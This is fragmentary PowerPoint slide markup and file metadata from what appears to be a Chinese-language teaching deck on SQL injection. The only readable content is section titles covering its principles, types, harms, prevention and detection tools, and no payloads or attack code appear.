                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>SQL</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>注入</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2798814" y="5247611"/>
            <a:ext cx="5108831" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5108830" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="Group 202"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5108830" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5108830" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="Shape 199"/>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3</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Shape 200"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="321433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注入分类</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2811076" y="11522978"/>
            <a:ext cx="5108831" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5108830" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 196"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5108830" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="510883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06</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Shape 194"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="321433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注入防范</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186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DECE92-4B36-CB5B-5096-746FDFA0AA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12798814" y="3154976"/>
            <a:ext cx="5729195" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5729193" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C0B463-91CA-6F07-7607-2C9757AC5323}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5729193" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5729192" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Shape 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860EFAAF-90C0-C961-739A-ED97E516BAB8}"/>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2</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B6FFB6-B04F-6E8B-956C-BFFF7AC6B616}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="383470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en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>SQL</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>注入的危害</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97662E8B-FA9B-BD74-F635-4CD819756622}"/>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198">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AC199D-F7FD-0A36-5354-7E23C59E6474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12811076" y="9459147"/>
            <a:ext cx="6134753" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="6134753" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80866E7C-B9E9-3703-6E96-A582C6908EC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="6134753" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="6134753" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 193">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F48942-9E81-72C1-93AC-AD673838D073}"/>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5</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Shape 194">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0656B753-704D-7EEC-F71D-73ECEEDBCF34}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="4240261"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注入检测工具</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C7E8DFE-20BE-D1A9-410A-5B6CE741EFAE}"/>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338465840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283154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55594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Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞原理</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9276113" y="8461366"/>
            <a:ext cx="5297137" cy="3972853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>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7553577" y="4994844"/>
            <a:ext cx="7439024" cy="4190999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{247353F6-7AE4-FB3F-617F-8F6D8B6822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21" y="8461366"/>
            <a:ext cx="8362950" cy="2305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c8ba65-d2d4-45ae-8807-383edd5b404f"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMzVhMzJkZWI4OThhNjhlZDFhNTAzZGY0YWE3YjhmMj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1803</TotalTime>
  <Words>12329</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>960</Paragraphs>
  <Slides>69</Slides>
  <Notes>54</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69</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="85" baseType="lpstr">
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>pingfang SC</vt:lpstr>
      <vt:lpstr>SentyWen</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Nunito Sans</vt:lpstr>
      <vt:lpstr>Wingdings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loong xu</cp:lastModifiedBy>
  <cp:revision>332</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-28T07:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-07T04:49:09Z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